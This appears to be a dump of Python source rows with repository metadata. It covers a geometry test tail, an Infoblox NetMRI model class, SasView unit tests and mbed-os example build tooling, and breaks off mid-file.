[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| true | true |
f72eb7cef44043a2b1295eb4b8935af5db17e752 | 1,064 | py | Python | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
    """Remote model for one row of the device-viewer "open services" grid.

    | ``id:`` none
    | ``attribute type:`` string
    | ``DeviceID:`` none
    | ``attribute type:`` string
    | ``DataSourceID:`` none
    | ``attribute type:`` string
    | ``ipaddress:`` none
    | ``attribute type:`` string
    | ``ListenAddr:`` none
    | ``attribute type:`` string
    | ``PortProtocol:`` none
    | ``attribute type:`` string
    | ``Port:`` none
    | ``attribute type:`` string
    | ``ExpectedService:`` none
    | ``attribute type:`` string
    | ``Service:`` none
    | ``attribute type:`` string
    | ``PortTimestamp:`` none
    | ``attribute type:`` string
    """

    # Names of the attributes this model exposes; presumably populated from
    # the API response by the RemoteModel base class (not visible here).
    properties = ("id",
                  "DeviceID",
                  "DataSourceID",
                  "ipaddress",
                  "ListenAddr",
                  "PortProtocol",
                  "Port",
                  "ExpectedService",
                  "Service",
                  "PortTimestamp",
                  )
| 20.461538 | 54 | 0.470865 | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
"PortTimestamp",
)
| true | true |
f72eb800bacb5e3e23d6174f7e147ea13700f6c0 | 1,887 | py | Python | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | """
Unit tests for the sas_gen
"""
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
    """Return the path of *filename* inside this test module's data dir."""
    data_dir = os.path.join(os.path.dirname(__file__), 'data')
    return os.path.join(data_dir, filename)
class sas_gen_test(unittest.TestCase):
    """Exercise the sas_gen file readers and the GenSAS calculator."""

    def setUp(self):
        # One reader instance per supported input format.
        self.sldloader = sas_gen.SLDReader()
        self.pdbloader = sas_gen.PDBReader()
        self.omfloader = sas_gen.OMFReader()

    def test_sldreader(self):
        """A .sld file loads with the expected first coordinates."""
        data = self.sldloader.read(find("sld_file.sld"))
        self.assertEqual(data.pos_x[0], -40.5)
        self.assertEqual(data.pos_y[0], -13.5)
        self.assertEqual(data.pos_z[0], -13.5)

    def test_pdbreader(self):
        """A .pdb file loads with the expected first atom position."""
        data = self.pdbloader.read(find("c60.pdb"))
        self.assertEqual(data.pos_x[0], -0.733)
        self.assertEqual(data.pos_y[0], -1.008)
        self.assertEqual(data.pos_z[0], 3.326)

    def test_omfreader(self):
        """A .omf file loads and converts to SLD data."""
        data = self.omfloader.read(find("A_Raw_Example-1.omf"))
        converter = sas_gen.OMF2SLD()
        converter.set_data(data)
        self.assertEqual(data.mx[0], 0)
        self.assertEqual(data.my[0], 0)
        self.assertEqual(data.mz[0], 0)
        self.assertEqual(converter.pos_x[0], 0.0)
        self.assertEqual(converter.pos_y[0], 0.0)
        self.assertEqual(converter.pos_z[0], 0.0)

    def test_calculator(self):
        """The GenSAS calculator runs on data converted from a .omf file."""
        data = self.omfloader.read(find("A_Raw_Example-1.omf"))
        converter = sas_gen.OMF2SLD()
        converter.set_data(data)
        model = sas_gen.GenSAS()
        model.set_sld_data(converter.output)
        # Drop q = 0 from the evaluation grid.
        q_values = np.linspace(0, 0.1, 11)[1:]
        model.runXY([q_values, q_values])
if __name__ == '__main__':
unittest.main()
| 25.5 | 68 | 0.594065 |
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| true | true |
f72eb836bf1ae0ede245207bbaad409be8cbc77e | 22,844 | py | Python | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2021-01-28T09:12:02.000Z | 2021-01-28T11:03:26.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 7 | 2019-04-11T10:12:18.000Z | 2020-10-27T12:54:57.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2016-07-21T12:40:27.000Z | 2016-07-22T11:29:19.000Z | #!/usr/bin/env python
"""
Copyright (c) 2017-2019 ARM Limited. All rights reserved.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations
"""
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
""" Import and bulid a bunch of example programs
This library includes functions that are shared between the examples.py and
the update.py modules.
"""
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
    """Convert a PrettyTable into a list of row dicts keyed by field name.

    Args:
        pretty_table - the PrettyTable to convert

    Returns: list of dicts, one per row, mapping field name -> stripped
             cell text
    """
    rows = []
    for pretty_row in pretty_table:
        # Disable border/header once per row (hoisted out of the per-field
        # loop) so get_string() yields only the bare cell value.
        pretty_row.border = False
        pretty_row.header = False
        row = {}
        for key in pretty_table.field_names:
            row[key] = pretty_row.get_string(fields=[key]).strip()
        rows.append(row)
    return rows
def get_build_summary(results):
    """Prints to screen the compilation results of example programs.
    Args:
    results - results of the compilation stage, i.e. the output of compile_repos()
    Returns: Number of failed results
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    # Failure table uses the same layout as the pass table.
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    # Each status is [compiled, pass_status, successes, failures] (see compile_repos).
    for exp, status in list(results.items()):
        for summary in status[2]:  # successes
            pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
        for summary in status[3]:  # failures
            fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
            failure_counter+=1
    print("\n\nPassed Example Compilation:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Compilation:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    # output build information to json file
    rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
    with open("build_data.json", "w") as write_file:
        json.dump(rows, write_file, indent=4, sort_keys=True)
    return failure_counter
def get_export_summary(results):
    """Prints to screen the exporting results of example programs.
    Args:
    results - results of the export stage, i.e. the output of export_repos()
    Returns: Number of failed results
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    # Failure table uses the same layout as the pass table.
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    # Each status is [exported, pass_status, successes, export_failures,
    # build_failures, build_skips] (see export_repos).
    for exp, status in list(results.items()):
        for summary in status[2]:  # exported and built
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
        for summary in status[3]:  # export failed
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
            failure_counter+=1
        for summary in status[4]:  # exported but build failed
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
            failure_counter+=1
        for summary in status[5]:  # exporter cannot build; not a failure
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
    print("\n\nPassed Example Exporting:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Exporting:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    return failure_counter
def valid_choices(allowed_choices, all_choices):
    """Return the members of *all_choices* permitted by *allowed_choices*.

    An empty *allowed_choices* means "no restriction", so the full choice
    list is returned unchanged; otherwise the intersection is returned in
    *all_choices* order.
    """
    if not allowed_choices:
        return all_choices
    return [choice for choice in all_choices if choice in allowed_choices]
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
    """Yield (target, toolchain) pairs for the cross product of the inputs.

    Args:
    allowed_targets - a list of all possible targets
    allowed_toolchains - a list of all possible toolchains

    Kwargs:
    features - names that must all be present in TARGET_MAP[target].features
               for the target to be yielded (an empty list accepts any target)
    """
    for candidate_target in allowed_targets:
        for candidate_toolchain in allowed_toolchains:
            # Lazily evaluated: with an empty feature list TARGET_MAP is
            # never consulted, matching the original short-circuit.
            supported = all(feature in TARGET_MAP[candidate_target].features
                            for feature in features)
            if supported:
                yield candidate_target, candidate_toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
    """Yield (target, ide) pairs for the cross product of the inputs.

    Args:
    allowed_targets - a list of all possible targets
    allowed_ides - a list of all possible IDEs

    Kwargs:
    features - names that must all be present in TARGET_MAP[target].features
    toolchains - if non-empty, the exporter's toolchain must be one of these
    """
    for candidate_target in allowed_targets:
        for candidate_ide in allowed_ides:
            # Guard clauses mirror the original short-circuit order.
            if not EXPORTERS[candidate_ide].is_target_supported(candidate_target):
                continue
            if toolchains and EXPORTERS[candidate_ide].TOOLCHAIN not in toolchains:
                continue
            if not all(feature in TARGET_MAP[candidate_target].features
                       for feature in features):
                continue
            yield candidate_target, candidate_ide
def get_sub_examples_list(example):
    """Return the example names to process for *example*.

    For a multi-example repository ('sub-repo-example' truthy) this is
    "<repo name>/<sub name>" for every entry under 'subs'; otherwise it is
    a single-element list holding the repository name itself.
    """
    if not example['sub-repo-example']:
        return [example["name"]]
    return ["%s/%s" % (example["name"], sub) for sub in example['subs']]
def source_repos(config, exp_filter):
    """ Imports each of the repos and its dependencies (.lib files) associated
    with the specific examples name from the json config file. Note if
    there is already a clone of the repo then it will first be removed to
    ensure a clean, up to date cloning.
    Args:
    config - the json object imported from the file.
    exp_filter - names of the examples to import.
    Returns 0 on success, or the mbed-cli exit status of the first failure.
    """
    print("\nImporting example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                # Remove the stale checkout so the import starts clean.
                rmtree(name)
            cmd = "mbed-cli import %s" % example['github']
            logging.info("Executing command '%s'..." % cmd)
            result = subprocess.call(cmd, shell=True)
            if result:
                # Abort on the first failing import and propagate its status.
                return result
    return 0
def clone_repos(config, exp_filter , retry = 3):
    """ Clones each of the repos associated with the specific examples name from the
    json config file. Note if there is already a clone of the repo then it will first
    be removed to ensure a clean, up to date cloning.
    Args:
    config - the json object imported from the file.
    exp_filter - names of the examples to clone.
    retry - number of clone attempts per repo before giving up.
    Returns 0 on success, 1 if any repo could not be cloned.
    """
    print("\nCloning example repos....\n")

    def _remove_readonly(func, path, _):
        # On Windows files under .git are read-only and make rmtree fail;
        # clear the flag and retry the failing operation. (Previously the
        # code referenced an undefined name 'remove_readonly' here, which
        # raised NameError whenever a stale checkout had to be deleted.)
        os.chmod(path, stat.S_IWRITE)
        func(path)

    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                rmtree(name, onerror=_remove_readonly)
            cmd = "git clone %s" % example['github']
            for i in range(0, retry):
                logging.info("Executing command '%s'..." % cmd)
                if not subprocess.call(cmd, shell=True):
                    break
            else:
                # All attempts exhausted without a successful clone.
                logging.error("unable to clone the repo '%s'" % name)
                return 1
    return 0
def deploy_repos(config, exp_filter):
    """ If the example directory exists as provided by the json config file,
    pull in the examples dependencies by using `mbed-cli deploy`.
    Args:
    config - the json object imported from the file.
    exp_filter - names of the examples to deploy.
    Returns 0 on success, a non-zero status on the first failure.
    """
    print("\nDeploying example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                cmd = "mbed-cli deploy"
                logging.info("Executing command '%s'..." % cmd)
                result = subprocess.call(cmd, shell=True)
                # Always return to the original working directory before
                # deciding whether to abort.
                os.chdir(CWD)
                if result:
                    logging.error("mbed-cli deploy command failed for '%s'" % name)
                    return result
            else:
                logging.info("'%s' example directory doesn't exist. Skipping..." % name)
                # NOTE(review): a missing directory aborts the whole deploy
                # with status 1 despite the "Skipping" message — confirm
                # this is intended rather than `continue`.
                return 1
    return 0
def export_repos(config, ides, targets, exp_filter):
    """Exports and builds combinations of example programs, targets and IDEs.
    The results are returned in a [key: value] dictionary format:
    Where key = The example name from the json config file
    value = a list containing: exported, pass_status, successes,
    export_failures, build_failures, and build_skips
    where pass_status = The overall pass status for the export of the full
    set of example programs comprising the example suite
    (IE they must build and export). True if all examples pass, false otherwise
    successes = list of examples that exported and built (if possible)
    If the exporter has no build functionality, then it is a pass
    if exported
    export_failures = list of examples that failed to export.
    build_failures = list of examples that failed to build
    build_skips = list of examples that cannot build
    Both successes and failures contain the example name, target and IDE
    Args:
    config - the json object imported from the file.
    ides - List of IDEs to export to
    targets - list of target names
    exp_filter - names of the examples to export
    """
    results = {}
    print("\nExporting example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        export_failures = []
        build_failures = []
        build_skips = []
        successes = []
        exported = True
        pass_status = True
        if example['export']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, IDE, and features combinations are valid and return a
                # list of valid combinations to work through
                for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
                                                    valid_choices(example['exporters'], ides),
                                                    example['features'], example['toolchains']):
                    example_summary = {"name" : name, "target" : target, "ide" : ide }
                    summary_string = "%s %s %s" % (name, target, ide)
                    logging.info("Exporting %s" % summary_string)
                    cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
                    logging.info("Executing command '%s'..." % " ".join(cmd))
                    proc = subprocess.Popen(cmd)
                    proc.wait()
                    if proc.returncode:
                        export_failures.append(example_summary)
                        logging.error("FAILURE exporting %s" % summary_string)
                    else:
                        logging.info("SUCCESS exporting %s" % summary_string)
                        logging.info("Building %s" % summary_string)
                        try:
                            if EXPORTERS[ide].build(name, cleanup=False):
                                logging.error("FAILURE building %s" % summary_string)
                                build_failures.append(example_summary)
                            else:
                                logging.info("SUCCESS building %s" % summary_string)
                                successes.append(example_summary)
                        except TypeError:
                            # Exporter has no build support: the export alone
                            # counts as a success and the build is skipped.
                            successes.append(example_summary)
                            build_skips.append(example_summary)
                os.chdir(CWD)
            if len(build_failures+export_failures) > 0:
                pass_status= False
        else:
            exported = False
        results[example['name']] = [exported, pass_status, successes,
                                    export_failures, build_failures, build_skips]
    return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
    """Compiles combinations of example programs, targets and compile chains.
    The results are returned in a [key: value] dictionary format:
    Where key = The example name from the json config file
    value = a list containing: compiled, pass_status, successes, and failures
    where pass_status = The overall pass status for the compilation of the full
    set of example programs comprising the example suite.
    True if all examples pass, false otherwise
    successes = list of passing examples.
    failures = list of failing examples.
    Both successes and failures contain the example name, target and compile chain
    Also writes a greentea-style "test_spec.json" describing the built images.
    Args:
    config - the json object imported from the file.
    toolchains - List of toolchains to compile for.
    targets - list of target names
    profiles - build profile path or name if in default place
    verbose - enabling verbose
    exp_filter - List of exp_filter to be build
    cmake - use mbed-tools (CMake) instead of mbed-cli
    jobs - Number of compile jobs
    """
    results = {}
    test_json = {"builds":{}}
    base_path = os.getcwd()
    print("\nCompiling example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        failures = []
        successes = []
        compiled = True
        pass_status = True
        if example['test']:
            # Test generation needs both keys; disable tests if either is absent.
            if not ('baud_rate' in example and 'compare_log'in example):
                logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
                example['test'] = False
        if example['compile']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, toolchain and features combinations are valid and return a
                # list of valid combinations to work through
                for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
                                                                valid_choices(example['toolchains'], toolchains),
                                                                example['features']):
                    example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
                    summary_string = "%s %s %s" % (name, target, toolchain)
                    logging.info("Compiling %s" % summary_string)
                    if cmake:
                        build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
                    else:
                        build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
                    if profiles:
                        for profile in profiles:
                            build_command_seq[0] += " --profile {}".format(profile)
                    failed_flag = False
                    for build_command in build_command_seq:
                        logging.info("Executing command '%s'..." % build_command)
                        proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        std_out, std_err = proc.communicate()
                        std_out = std_out.decode()
                        std_err = std_err.decode()
                        print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
                        if proc.returncode:
                            failures.append(example_summary)
                            failed_flag = True
                            break
                    if not failed_flag:
                        if example['test']:
                            log = example['compare_log'].pop(0)
                            # example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
                            # pop the log file out of list regardless the compilation for each example pass of fail
                            image = fetch_output_image(std_out,cmake)
                            if image:
                                image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
                                test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
                                if not test_group in test_json['builds']:
                                    test_json['builds'][test_group] = {
                                        "platform":target ,
                                        "toolchain": toolchain ,
                                        "base_path": base_path ,
                                        "baud_rate": int(example['baud_rate']),
                                        "tests":{} }
                                test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
                                example_summary["test"] = "TEST_ON"
                            else:
                                logging.warning("could not find built image for example %s" % name)
                                example_summary["test"] = "NO_IMAGE"
                        else:
                            logging.warning("Test for %s will not be generated." % name)
                            example_summary["test"] = "TEST_OFF"
                        successes.append(example_summary)
                os.chdir(CWD)
            # If there are any compilation failures for the example 'set' then the overall status is fail.
            if len(failures) > 0:
                pass_status = False
        else:
            compiled = False
        results[example['name']] = [compiled, pass_status, successes, failures]
    write_json_to_file(test_json, "test_spec.json")
    return results
def update_example_version(config, tag, exp_filter):
    """Switch every already-cloned example repo in *exp_filter* to *tag*.

    Creates/resets a local branch named after the tag tracking origin, so
    each repo ends up on the requested mbed-os release line.

    Args:
    config - the json object imported from the file.
    tag - GitHub tag corresponding to a version of mbed-os to upgrade to.
    exp_filter - names of the examples to update.

    Returns 0 on success, or the git exit status of the first failure.
    """
    print("\nUpdating example to version(branch) '%s'\n" % tag)
    for example in config['examples']:
        repo_name = example['name']
        if repo_name not in exp_filter:
            continue
        os.chdir(repo_name)
        logging.info("In folder '%s'" % repo_name)
        cmd = "git checkout -B %s origin/%s" % (tag, tag)
        logging.info("Executing command '%s'..." % cmd)
        result = subprocess.call(cmd, shell=True)
        os.chdir(CWD)
        if result:
            return result
    return 0
def symlink_mbedos(config, path, exp_filter):
    """ Create a symbolic link in each example folder to given path.
    If a mbed-os.lib can be found in the folder, it will be emptied
    (kept as a placeholder) so the link is used instead of a checkout.
    Args:
    config - the json object imported from the file.
    path - target of the 'mbed-os' symlink.
    exp_filter - names of the examples to process.
    Returns 0.
    """
    print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        for name in get_sub_examples_list(example):
            os.chdir(name)
            logging.info("In folder '%s'" % name)
            if os.path.exists("mbed-os.lib"):
                # Truncate rather than delete: the build tools expect the
                # file to exist even when mbed-os is symlinked.
                logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
                open("mbed-os.lib", 'w').close()
            else:
                logging.warning("No 'mbed-os.lib' found in '%s'" % name)
            if os.path.exists("mbed-os"):
                logging.warning("'mbed-os' already existed in '%s'" % name)
            else:
                logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
                os.symlink(path, "mbed-os")
                #Cmake tool currently require 'mbed-os.lib' to be present to perform build.
                #Add a empty 'mbed-os.lib' as a workaround
                open('mbed-os.lib', 'a').close()
            os.chdir(CWD)
    return 0
def fetch_output_image(output, cmake):
    """Find the built image path in the last 30 lines of a build log.

    With *cmake* true the mbed-tools "-- built: <path>.bin" line is matched
    and a relative path is returned; otherwise the mbed-cli "Image: <path>"
    line is matched. Returns False when no existing image file is found.
    """
    lines = output.splitlines()
    # Index of the oldest line to inspect (at most the final 30 lines).
    oldest = -31 if len(lines) > 29 else (-1 - len(lines))
    for idx in range(-1, oldest, -1):
        line = lines[idx]
        if cmake:
            if line.startswith("-- built:") and line.endswith(".bin"):
                image = line[10:]
                print("IMAGE is " + image)
                if os.path.isfile(image):
                    return os.path.relpath(image)
        elif line.startswith("Image:"):
            image = line[7:]
            if os.path.isfile(image):
                return image
    return False
| 42.859287 | 149 | 0.573761 |
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
rows = []
for pretty_row in pretty_table:
row = {}
for key in pretty_table.field_names:
pretty_row.border = False
pretty_row.header = False
row[key] = pretty_row.get_string(fields=[key]).strip()
rows.append(row)
return rows
def get_build_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
failure_counter+=1
print("\n\nPassed Example Compilation:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Compilation:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
with open("build_data.json", "w") as write_file:
json.dump(rows, write_file, indent=4, sort_keys=True)
return failure_counter
def get_export_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
failure_counter+=1
for summary in status[4]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
failure_counter+=1
for summary in status[5]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
print("\n\nPassed Example Exporting:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Exporting:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
return failure_counter
def valid_choices(allowed_choices, all_choices):
if len(allowed_choices) > 0:
return [t for t in all_choices if t in allowed_choices]
else:
return all_choices
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
for target in allowed_targets:
for toolchain in allowed_toolchains:
if all(feature in TARGET_MAP[target].features
for feature in features):
yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
for target in allowed_targets:
for ide in allowed_ides:
if (EXPORTERS[ide].is_target_supported(target) and
(not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
all(feature in TARGET_MAP[target].features
for feature in features)):
yield target, ide
def get_sub_examples_list(example):
sub_examples = []
if example['sub-repo-example']:
for sub in example['subs']:
sub_examples.append("%s/%s" % (example["name"], sub))
else:
sub_examples.append(example["name"])
return sub_examples
def source_repos(config, exp_filter):
print("\nImporting example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name)
cmd = "mbed-cli import %s" % example['github']
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
if result:
return result
return 0
def clone_repos(config, exp_filter , retry = 3):
print("\nCloning example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name, onerror=remove_readonly)
cmd = "git clone %s" % example['github']
for i in range(0, retry):
logging.info("Executing command '%s'..." % cmd)
if not subprocess.call(cmd, shell=True):
break
else:
logging.error("unable to clone the repo '%s'" % name)
return 1
return 0
def deploy_repos(config, exp_filter):
print("\nDeploying example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "mbed-cli deploy"
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
